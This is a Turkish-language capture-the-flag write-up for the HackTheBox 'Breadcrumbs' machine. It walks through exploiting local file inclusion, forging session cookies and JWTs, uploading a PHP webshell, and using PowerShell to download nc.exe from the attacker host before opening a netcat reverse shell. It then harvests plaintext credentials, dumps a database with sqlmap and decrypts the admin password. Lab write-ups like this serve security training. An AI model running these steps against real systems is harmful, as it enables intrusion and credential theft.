BREADCRUMBS ÇÖZÜMÜ [HackTheBox]

Merhabalar, uzun zamandan sonra hackthebox’un breadcrumbs adındaki makinesini çözeceğiz. Makine windows ve seviyesi zor olarak karşımıza çıkmaktadır. İlk olarak nmap ile makinenin ilk 10000 portlarını tarıyoruz.

 ──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT   STATE SERVICE    VERSION
22/tcp  open ssh      OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp  open http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp  open msrpc     Microsoft Windows RPC
139/tcp  open netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open ssl/http   Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp  open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc     Microsoft Windows RPC
49665/tcp open msrpc     Microsoft Windows RPC
49666/tcp open msrpc     Microsoft Windows RPC
49667/tcp open msrpc     Microsoft Windows RPC
49668/tcp open msrpc     Microsoft Windows RPC
49669/tcp open msrpc     Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Makine’nin 22,80,443 ve 3306 portları ilk olarak gözümüze çarpıyor.
80 portuna gittiğimizde bizi bir web sayfası karşılıyor.

Sayfayı burp ile kontrol ettiğimizde Local File Inclusion (LFI) açıklığının olduğunu görüyoruz.

POST /includes/bookController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 26book=../index.php&method=1

x

Mysql bilgilerini lfi açıklığı ile gördük, ancak mysql server dışarıya açık olmadığından dolayı bağlantı kuramadık.Sistemden yetkili bir kullanıcı ile giriş yapmak için cookie.php dosyasını inceleyerek session alacağız.

POST /includes/bookController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 38book=../portal/cookie.php&method=1

Response

“<?php\r\n/**\r\n * @param string $username Username requesting session cookie\r\n * \r\n * @return string $session_cookie Returns the generated cookie\r\n * \r\n * @devteam\r\n * Please DO NOT use default PHPSESSID; our security team says they are predictable.\r\n * CHANGE SECOND PART OF MD5 KEY EVERY WEEK\r\n * */\r\nfunction makesession($username){\r\n $max = strlen($username) - 1;\r\n $seed = rand(0, $max);\r\n $key = “s4lTy_stR1nG_”.$username[$seed].”(!528./9890";\r\n $session_cookie = $username.md5($key);\r\n\r\n return $session_cookie;\r\n}"

PHP kodunu inceleyerek salt ile MD5 keyi oluşturuyoruz. (PHPSESSION)

paul47200b180ccd6835d25d034eeb6e6390

Cookie’yi incelediğimizde secret key ile token üretmemiz lazım.
POST /includes/bookController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=480ifp24jq5q4l14mepp0cgkif

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 34book=../portal/authController.php&method=1

authController.php’yi LFI ile okuduğumuzda secret keyi görüyoruz.

$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';

Şimdi secret keyi jwt.io internet adresi üzerinde token oluşturuyoruz.
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Şimdi burp ile cookie yerine ürettiğimiz phpsession ve tokeni girerek yetki elde ediyoruz.

htb189

File manager sekmesine girip ordan webshell yüklüyoruz.

POST /portal/includes/fileController.php HTTP/1.1

Host: 10.10.10.228

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Length: 295------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="file"; filename="shell.html"

Content-Type: text/html<?php phpinfo();?>

------WebKitFormBoundary7MA4YWxkTrZu0gW

Content-Disposition: form-data; name="task"test.php

------WebKitFormBoundary7MA4YWxkTrZu0gW--

Webshell yükledikten sonra /portal/uploads/ klasörüne gidiğ kontrol ediyoruz.

htb190

Daha sonra webshelle gidip komut çalıştırıyoruz.

http://10.10.10.228/portal/uploads/luci.php?cmd=systeminfo


Host Name:         BREADCRUMBS
OS Name:          Microsoft Windows 10 Pro
OS Version:        10.0.19041 N/A Build 19041
OS Manufacturer:      Microsoft Corporation
OS Configuration:     Standalone Workstation
OS Build Type:       Multiprocessor Free
Registered Owner:     temp
Registered Organization:  
Product ID:        00331-20309-59368-AA373
Original Install Date:   1/15/2021, 3:27:37 PM
System Boot Time:     2/23/2021, 4:41:02 AM
System Manufacturer:    VMware, Inc.
System Model:       VMware7,1
System Type:        x64-based PC

Powershell’i kullanarak karşıya netcat (netcat.exe) yüklüyoruz.

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.228 - - [23/Feb/2021 12:30:00] "GET /nc.exe HTTP/1.1" 200 -

http://10.10.10.228/portal/uploads/shell.php?cmd=powershell%20(new-object%20Net.WebClient).DownloadFile('http://10.10.14.12/nc.exe','C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads\nc.exe')

Netcat’i kullanarak reverse shell alıyoruz.

http://10.10.10.228/portal/uploads/shell.php?cmd=nc.exe%2010.10.14.12%203221%20-e%20c:\windows\system32\cmd.exe

┌──(root💀kali)-[~]
└─# nc -lvp 3221
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::3221
Ncat: Listening on 0.0.0.0:3221
Ncat: Connection from 10.10.10.228.
Ncat: Connection from 10.10.10.228:50994.
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>whoami
whoami
breadcrumbs\www-data

C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 7C07-CD3A

 Directory of C:\Users\www-data\Desktop\xampp\htdocs\portal\uploads

02/23/2021 09:41 AM  <DIR>     .
02/23/2021 09:41 AM  <DIR>     ..
02/23/2021 09:13 AM        437 shell.php
02/23/2021 09:41 AM      45,272 nc.exe
02/23/2021 08:37 AM        18 test.php
02/23/2021 09:04 AM        467 test11.php
        4 File(s)     46,194 bytes
        2 Dir(s)  6,313,857,024 bytes free

Dosyaları kontrol ederken Juliette kullanıcısının şifresini buluyoruz.

C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData>type juliette.json
type juliette.json
{
    "pizza" : "margherita",
    "size" : "large",
    "drink" : "water",
    "card" : "VISA",
    "PIN" : "9890",
    "alternate" : {
        "username" : "juliette",
        "password" : "jUli901./())!",
    }
}

Ssh bağlantısı atıyoruz ve user.txt’yi okuyoruz.

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# ssh juliette@10.10.10.228
juliette@10.10.10.228’s password:
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

  juliette@BREADCRUMBS C:\Users\juliette>whoami    
  breadcrumbs\juliette          
                      
  juliette@BREADCRUMBS C:\Users\juliette>dir
   Volume in drive C has no label.         
   Volume Serial Number is 7C07-CD3A        
                           
   Directory of C:\Users\juliette          
                           
  02/01/2021 05:48 AM  <DIR>     .     
  02/01/2021 05:48 AM  <DIR>     ..     
  01/15/2021 04:00 PM  <DIR>     3D Objects 
  01/15/2021 04:00 PM  <DIR>     Contacts  
  01/15/2021 04:04 PM  <DIR>     Desktop  
  01/15/2021 04:00 PM  <DIR>     Documents 
  01/15/2021 04:00 PM  <DIR>     Downloads 
  01/15/2021 04:00 PM  <DIR>     Favorites 
  01/15/2021 04:00 PM  <DIR>     Links   
  01/15/2021 04:00 PM  <DIR>     Music   
  01/15/2021 04:03 PM  <DIR>     OneDrive  
  01/15/2021 04:00 PM  <DIR>     Pictures  
  01/15/2021 04:00 PM  <DIR>     Saved Games
  01/15/2021 04:00 PM  <DIR>     Searches  
  01/15/2021 04:00 PM  <DIR>     Videos   
          0 File(s)       0 bytes   
         15 Dir(s)  6,313,771,008 bytes free
                           
  juliette@BREADCRUMBS C:\Users\juliette>dir Desktop
   Volume in drive C has no label.     
   Volume Serial Number is 7C07-CD3A    
                       
   Directory of C:\Users\juliette\Desktop 
                       
  01/15/2021 04:04 PM  <DIR>     . 
  01/15/2021 04:04 PM  <DIR>     ..
  12/09/2020 06:27 AM        753 todo.html
  02/23/2021 04:42 AM        34 user.txt
          2 File(s)      787 bytes
          2 Dir(s)  6,313,771,008 bytes free

  juliette@BREADCRUMBS C:\Users\juliette>type Desktop\user.txt
  46c5036915d0f9a7dc2e480befc603d5

todo.html adlı dosyası inceliyoruz.

juliette@BREADCRUMBS C:\Users\juliette\Desktop>type todo.html
<html>                           
<style>                          
html{                           
background:black;                     
color:orange;                       
}                             
table,th,td{                        
border:1px solid orange;                  
padding:1em;                        
border-collapse:collapse;                 
}                             
</style>                          
<table>                          
    <tr>                        
      <th>Task</th>                 
      <th>Status</th>                
      <th>Reason</th>                
    </tr>                       
    <tr>                        
      <td>Configure firewall for port 22 and 445</td>
      <td>Not started</td>              
      <td>Unauthorized access might be possible</td> 
    </tr>                       
    <tr>
      <td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>
      <td>In progress</td>
      <td>It stores passwords in plain text</td>
    </tr>
    <tr>
      <td>Add new features to password manager</td>
      <td>Not started</td>
      <td>To get promoted, hopefully lol</td>
    </tr>
</table>

</html>

Okuduğumuz dosyada Microsoft Store Sticky Notes adlı programda şifreleri depoladığını belirtiyor.

juliette@BREADCRUMBS C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState>dir
 Volume in drive C has no label.
 Volume Serial Number is 7C07-CD3A

 Directory of C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState

01/15/2021 04:10 PM  <DIR>     .
01/15/2021 04:10 PM  <DIR>     ..
01/15/2021 04:10 PM      20,480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
11/29/2020 03:10 AM       4,096 plum.sqlite
01/15/2021 04:10 PM      32,768 plum.sqlite-shm
01/15/2021 04:10 PM      329,632 plum.sqlite-wal
        4 File(s)    386,976 bytes
        2 Dir(s)  6,313,762,816 bytes free

Sqlite dosyalarını incelerken şifreleri buluyoruz.

juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]

Development kullanıcı ile ssh bağlantısı kuruyoruz.

C dizinindeki Development klasörüne göz atıyoruz Krypter_Linux adlı klasör olduğunu görüyoruz.
development@BREADCRUMBS C:\Users\development>cd C:\Development

development@BREADCRUMBS C:\Development>dir
 Volume in drive C has no label.          
 Volume Serial Number is 7C07-CD3A         
                          
 Directory of C:\Development            
                          
01/15/2021 04:03 PM  <DIR>     .      
01/15/2021 04:03 PM  <DIR>     ..      
11/29/2020 03:11 AM      18,312 Krypter_Linux
        1 File(s)     18,312 bytes    
        2 Dir(s)  6,310,158,336 bytes free

Krypter_Linux’u incelediğimizde hedef makinanın 1234 portunda yer aldığını görüyoruz.

htb192

PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing


StatusCode    : 200                                                
StatusDescription : OK                                                
Content      : selectarray(1) {                                         
           [0]=>                                              
           array(1) {                                           
            ["aes_key"]=>                                         
            string(16) "k19D193j.<19391("                                 
           }                                                
          }                                                 
                                                           
RawContent    : HTTP/1.1 200 OK                                          
          Keep-Alive: timeout=5, max=100                                  
          Connection: Keep-Alive                                      
          Content-Length: 96                                        
          Content-Type: text/html; charset=UTF-8                              
          Date: Tue, 23 Feb 2021 19:24:09 GMT                                
          Server: Apache/2.4.46 (Win64) ...                                 
Forms       :                                                  
Headers      : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type, 
          text/html; charset=UTF-8]...}                                   
Images      : {}                                                
InputFields    : {}                                                
Links       : {}                                                
ParsedHtml    :                                                  
RawContentLength : 96 

SSH ile port forwarding yapıyoruz.
ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
 [0]=>
 array(1) {
  ["aes_key"]=>
  string(16) "k19D193j.<19391("
 }
}

Port forwarding yaptıktan sonra sqlmap ile şifreleri dump ediyoruz.

sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump

Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account    | aes_key     | password                   |
+----+---------------+------------------+----------------------------------------------+
| 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+

Hash’i aes key ile decrypt ediyoruz.

Salted Hash: H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=
Salt Key : k19D193j.<19391(
Decrpyt URI: CyberChef
Decrypted Hash: p@ssw0rd!@#$9890./

Kırdığımız şifre ile ssh bağlantısı atıp root.txt’yi okuyoruz.

┌──(root💀kali)-[~/hackthebox/machine/Breadcrumbs]
└─# ssh administrator@10.10.10.228
administrator@10.10.10.228’s password:
Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.

administrator@BREADCRUMBS C:\Users\Administrator>whoami
breadcrumbs\administrator

administrator@BREADCRUMBS C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is 7C07-CD3A

Directory of C:\Users\Administrator

01/26/2021 09:06 AM .
01/26/2021 09:06 AM …
01/15/2021 03:56 PM 3D Objects
01/15/2021 03:56 PM Contacts
02/09/2021 07:08 AM Desktop
01/15/2021 03:56 PM Documents
01/15/2021 03:56 PM Downloads
01/15/2021 03:56 PM Favorites
01/15/2021 03:56 PM Links
01/15/2021 03:56 PM Music
01/15/2021 04:00 PM OneDrive
01/15/2021 03:57 PM Pictures
01/15/2021 03:56 PM Saved Games
01/15/2021 03:57 PM Searches
01/15/2021 03:56 PM Videos
0 File(s) 0 bytes
15 Dir(s) 6,308,880,384 bytes free

administrator@BREADCRUMBS C:\Users\Administrator>type Desktop\root.txt
a47ac3139f51cdd4a4d30614eb277101

4 Beğeni